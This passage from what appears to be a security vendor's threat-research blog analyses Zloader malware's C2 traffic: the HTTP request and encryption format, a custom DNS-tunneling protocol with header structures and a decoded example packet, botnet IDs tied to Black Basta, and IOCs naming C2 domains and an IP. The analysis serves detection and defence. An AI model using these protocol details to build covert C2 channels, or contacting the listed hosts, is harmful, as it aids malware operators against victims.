An example Zloader C2 HTTP POST request is shown below:

POST / HTTP/1.1
Host: bigdealcenter.world
User-Agent: PresidentPutin
Rand: ififywiqobnuebnodoexitnaeppupeohruloxycaevsariuvupdefesyruyhefiguddyybebipcusobywezalykosyazubykaskyduniilsifeucxybocafoacyblywiwiduangyolyptaziosrelituurmeyvvuuwfuimvuakd
Connection: close
Content-Length: 300

Zloader uses the Security Support Provider Interface (SSPI) for TLS, rather than
using the WinINet API.

The body of the HTTP POST request continues to use the same bin storage data
structure from Zeus as shown below:

struct zeus_binstorage {
 unsigned char[20] random_bytes;
 size_t total_size;
 unsigned int num_items;
 unsigned char[16] md5_hash;
 size_t item_type_1;
 unsigned int compressed_size_1;
 unsigned int uncompressed_size_1;
 unsigned char[compressed_size_1] item_data_1;
 ...
 size_t item_type_n;
 unsigned int compressed_size_n;
 unsigned int uncompressed_size_n;
 unsigned char[compressed_size_n] item_data_n;
}

The bin storage data structure is then encrypted with the Zeus VisualEncrypt
algorithm, then encrypted again with a randomly generated 32-byte RC4 key. The
RC4 key itself is then encrypted with a hardcoded 1,024-bit RSA public key.
Thus, the first 128 bytes of the payload are the RSA encrypted RC4 key, followed
by the RC4 + VisualEncrypt encrypted bin storage content.

DNS TUNNELING

The most significant update to Zloader’s C2 communication is the addition of DNS
tunneling. Zloader implements a custom protocol on top of DNS using IPv4 to
tunnel encrypted TLS network traffic (using the Windows SSPI API). Zloader
constructs and parses DNS packets without relying on a third party library or
the Windows API.

Zloader DNS requests use the following format: 

[prefix].[header].[payload].[zloader_nameserver_domain]

The header consists of 14 bytes that are converted into 28 lowercase hexadecimal
values.

The 14-byte header consists of the following structure:

struct zloader_dns_tunnel_header{
 unsigned int session_id;        // randomly generated
 unsigned int sequence_num;      // incremented per packet
 byte msg_type;                  // 1-9
 byte field_1;
 unsigned int field_2;
}

The meaning of the last two fields varies depending on the message type, and is
unused for some message types. For message type 0x4, the field_2 value denotes
the number of parts that the message is broken into (typically 3) separated by
periods. Each part can contain up to 62 characters (31 bytes) to remain
compliant with the DNS protocol limit of 63 characters. Each packet can contain
up to three parts per packet. Therefore, larger messages must be fragmented and
sent in multiple packets. An example of a message type 0x4 (TLS client hello)
Zloader DNS packet is shown below:

cdn.90baf13f03000000040003000000.160303009d0100009903036713bfbe1a8dea1ce0b97a5196762fe327f8da77.0a06e9aff09fff3a4f07cc1400002ac02cc02bc030c02f009f009ec024c023.c028c027c00ac009c014c013009d009c003d003c00.ns1.brownswer.com

This first component cdn is a hardcoded prefix value. The second
component 90baf13f03000000040003000000 is the header that can be converted from
a hexadecimal string to binary values as shown below: 

 * Session ID: 0x3ff1ba90
 * Sequence number: 0x3
 * Message type: 0x4
 * Field 1: 0x0
 * Field 2: 0x3 (number of parts in the request)

The third component of the request is the
payload: 160303009d0100009903036713bfbe1a8dea1ce0b97a5196762fe327f8da77.0a06e9aff09fff3a4f07cc1400002ac02cc02bc030c02f009f009ec024c023.c028c027c00ac009c014c013009d009c003d003c00,
which in this example can be parsed as a TLS client hello message (after
converting from hexadecimal and removing the periods), as shown below: 

Content Type: 16 (0x16) indicates a Handshake message.

Version: 0303 (0x0303) indicates Handshake version TLS 1.2.

Length: 009d (0x009d) indicates the length of the Handshake message (157 bytes).

 * Handshake Type: 01 (0x01) indicates a ClientHello message.
 * Length: 000099 (0x000099) indicates the length of the ClientHello message
   (153 bytes).
 * Version: 0303 (0x0303) indicates ClientHello version TLS 1.2.
 * Random: 6713bfbe1a8dea1ce0b97a5196762fe327f8da770a06e9aff09fff3a4f07cc14 (32
   bytes) is the client's random value.
 * Session ID Length: 00 (0x00) indicates that there is no session ID.
 * Cipher Suites Length: 002a (0x002a) indicates the length of the cipher suites
   (42 bytes).
 * Cipher Suites:
   * c02c (TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384)
   * c02b (TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256)
   * c030 (TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384)
   * c02f (TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256)
   * 009f (TLS_DHE_RSA_WITH_AES_256_GCM_SHA384)
   * 009e (TLS_DHE_RSA_WITH_AES_128_GCM_SHA256)
   * c024 (TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384)
   * c023 (TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256)
   * c028 (TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384)
   * c027 (TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256)
   * c00a (TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA)
   * c009 (TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA)
   * c014 (TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA)
   * c013 (TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA)
   * 009d (TLS_RSA_WITH_AES_256_GCM_SHA384)
   * 009c (TLS_RSA_WITH_AES_128_GCM_SHA256)
   * 003d (TLS_RSA_WITH_AES_256_CBC_SHA256)
   * 003c (TLS_RSA_WITH_AES_128_CBC_SHA256)

The last component ns1.brownswer.com is the Zloader C2 domain nameserver.

For message type 0x7, the field_2 value specifies the number of bytes that have
been received (and acknowledged) from the DNS server. The following table shows
the current Zloader DNS message types.

Message Type

Description

Record Type

0x1

Ping.

A

0x2

Session start.

A

0x3

Session initialization.

A

0x4

TLS client hello / client application data transfer.

A

0x5

Client data transfer complete.

A

0x6

Prepare server response.

A

0x7

TLS server hello request / server application data.

AAAA

0x8

Sent when the sequence number is a multiple of 100 (and greater than 0).

A

0x9

Unknown.

A

Table 2: Zloader 2.9.4.0 DNS tunnel message types.

The Zloader DNS server responds with A records that contain IPv4 addresses which
serve different purposes. For example, the IPv4 address 8.8.8.8 is used as an
acknowledgement message. For message type 0x7 packets that may involve
transferring large amounts of data, the Zloader DNS server responds with IPv6
AAAA records.


BOTNET AND CAMPAIGN IDS

ThreatLabz has identified the following Zloader version 2.9.4.0 botnet IDs and
campaigns:

Botnet ID

Campaign ID

File Names

Test

1.0

HexaPort.exe, SyncSuite.exe, OmniScript.dll, PixelSignal.dll

Penta1

1.1

HexaLab.dll, HexaPort.dll

Penta2

1.1

HexaPort.dll, XenoGraph.dll, GridCloud.dll

BB3

1.1

PhoenixHub.dll, XenoLogic.dll

Table 3: Zloader 2.9.4.0 botnet IDs, campaign IDs, and file names.

The botnet ID BB3 is notable because it follows the same format used by Qakbot
and Pikabot when those threat groups served as initial access brokers for Black
Basta ransomware. Open source reporting, including CISA and Rapid7, has also
tied Zloader with Black Basta distribution. Thus, ThreatLabz assesses with
moderate to high confidence that this specific Zloader botnet ID is related to
Black Basta ransomware attacks.




CONCLUSION

Zloader’s distribution methods and a new DNS tunneling communication channel
suggest the group is focusing increasingly on evading detection. The threat
group continues to add new features and functionality to more effectively serve
as an initial access broker for ransomware. With the latest Zloader updates,
organizations must ensure that they are inspecting not only web-based traffic,
but also DNS-based network traffic. Zscaler ThreatLabz will continue to track
this threat and add detections to protect our customers.




ZSCALER COVERAGE

Zscaler’s multilayered cloud security platform detects indicators related to
Zloader at various levels.

Figure 6: Zscaler Cloud Sandbox report

In addition to sandbox detections, Zscaler’s multilayered cloud security
platform detects indicators related to Zloader at various levels with the
following threat names:

 * Win64.Downloader.Zloader




INDICATORS OF COMPROMISE (IOCS)

Indicator

Description

22c5858ff8c7815c34b4386c3b4c83f2b8bb23502d153f5d8fb9f55bd784e764

Zloader sample SHA256

603bd9ee50f7dc6de37f314bda227561f0fd67cdebf53a672ea32cce73a2efd3

Zloader sample SHA256

d212042504f851253347754c3d3624628e7ebf7c0bbd8160220bf6edcff24f16

Zloader sample SHA256

ec8414631644269ab230c222055beb36546ff3ee39cebbbfa7e794e2e609c8d9

Zloader sample SHA256

17a9900aff30928d54ce77bdcd0cdde441dd0215f8187bac0a270c5f8e4db9cc

Zloader sample SHA256

2794a703aff5549a89834d0ef8ad4b97ce12e27fa37852dd2a504e5a0078b093

Zloader sample SHA256

3610f213db22a9de07dbbed4fbf6cec78b6dd4d58982c91f3a4ef994b53a8adc

Zloader sample SHA256

cbff717783ee597448c56a408a066aaae0279dd8606e6d99e52a04f0a7a55e03

Zloader sample SHA256

a9f2c4bc268765fc6d72d8e00363d2440cf1dcbd1ef7ee08978959fc118922c9

Zloader sample SHA256

db34e255aa4d9f4e54461571469b9dd53e49feed3d238b6cfb49082de0afb1e4

Zloader sample SHA256

49405370a33abbf131c5d550cebe00780cc3fd3cbe888220686582ae88f16af7

Zloader sample SHA256

f1a9ef13784ba05628c12decbbe44e7708793d1a707f9fbc2475c42e1ec2cb7d

Zloader sample SHA256

40b4bb1919e9079d1172c5dee5ac7d96c5e80ede412b8e3ef382230a908733cc

Zloader sample SHA256

bigdealcenter.world

Zloader HTTPS C2 server

unitedcommunity.world

Zloader HTTPS C2 server

ns1.brownswer.com

Zloader DNS C2 server

45.61.152.154Zloader DNS C2 nameserver resolver





Thank you for reading


WAS THIS POST USEFUL?

Yes, very!

Not really





EXPLORE MORE ZSCALER BLOGS

Zloader: No Longer Silent in the Night
Read post
Zloader Learns Old Tricks
Read post
Tracking 15 Years of Qakbot Development
Read post


GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX

*
















Subscribe

By submitting the form, you are agreeing to our privacy policy.






THE ZSCALER EXPERIENCE

Learn about:

Your world, securedZero TrustSecure Access Service Edge (SASE)Security Service
Edge (SSE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access
Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP)Data
Security Posture Management (DSPM)
PRODUCTS & SOLUTIONS
Secure Your Users

Secure Your Workloads

Secure Your IoT and OT

Secure Internet Access (ZIA)

Data Protection (CASB/DLP)

Digital Experience (ZDX)

Industry & Market Solutions

Partner Integrations

Zscaler Client Connector

PLATFORM
Zero Trust Exchange Platform

Secure Digital Transformation

Network Transformation

Application Transformation

Security Transformation

RESOURCES
Resource Library

Customer Success Stories

Security Preview

Threat Assessment Tools

ThreatLabz Analytics & Insights

Upcoming Events

Blog

Zscaler Academy

CXO Revolutionaries

Zpedia

Ransomware Protection ROI Calculator

POPULAR LINKS
Pricing & Plans

About Zscaler

Leadership Team

Career Opportunities

Find or Become a Partner

Customer Success Center

Investor Relations

Press Center

News & Announcements

Corporate Responsibility

Compliance

Contact Zscaler

Home
English
FrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues -
Brasil

Zscaler is universally recognized as the leader in zero trust. Leveraging the
largest security cloud on the planet, Zscaler anticipates, secures, and
simplifies the experience of doing business for the world's most established
companies.


English
FrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues -
Brasil
*


















Subscribe
Visit us on FacebookLinkedinFollow us on XSubscribe our Youtube Channel
SitemapPrivacyLegalSecurity
© 2024 Zscaler, Inc.

All rights reserved. Zscaler™ and other trademarks listed at
zscaler.com/legal/trademarks are either (i) registered trademarks or service
marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States
and/or other countries. Any other trademarks are the properties of their
respective owners.

Zscaler uses cookies, pixels, and other tools to collect information you provide
to us and to capture and record your interaction with our site. We use this
information to enhance site navigation, personalize content, analyze your use of
our website, and assist in our marketing efforts and customer service. To
deliver the best experience and to assist with our efforts, Zscaler social
media, advertising, analytics, and hosting service providers may have access to
the information that you provide to us. By clicking "Accept All," you consent to
our collection, use, and disclosure of such information and to ourTerms of
Service. For more information about our data processing practices, please see
ourPrivacy Policy.
Manage Cookie Preferences Reject All Accept All



PRIVACY PREFERENCE CENTER

When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All


MANAGE CONSENT PREFERENCES

STRICTLY NECESSARY COOKIES

Always Active

These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms.    You can set your browser to
block or alert you about these cookies, but some parts of the site will not then
work. These cookies do not store any personally identifiable information.

View Vendor Details‎

SOCIAL MEDIA COOKIES

Social Media Cookies

These cookies are set by a range of social media services that we have added to
the site to enable you to share our content with your friends and networks. They
are capable of tracking your browser across other sites and building up a
profile of your interests. This may impact the content and messages you see on
other websites you visit.    If you do not allow these cookies you may not be
able to use or see these sharing tools.

View Vendor Details‎

FUNCTIONAL COOKIES

Functional Cookies

These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages.    If you do not allow these cookies then
some or all of these services may not function properly.

View Vendor Details‎

PERFORMANCE COOKIES

Performance Cookies

These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site.    All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.

View Vendor Details‎

TARGETING COOKIES

Targeting Cookies

These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites.    They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.

View Vendor Details‎
Back Button


VENDORS LIST



Search Icon
Filter Icon

Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label

Reject All Confirm My Choices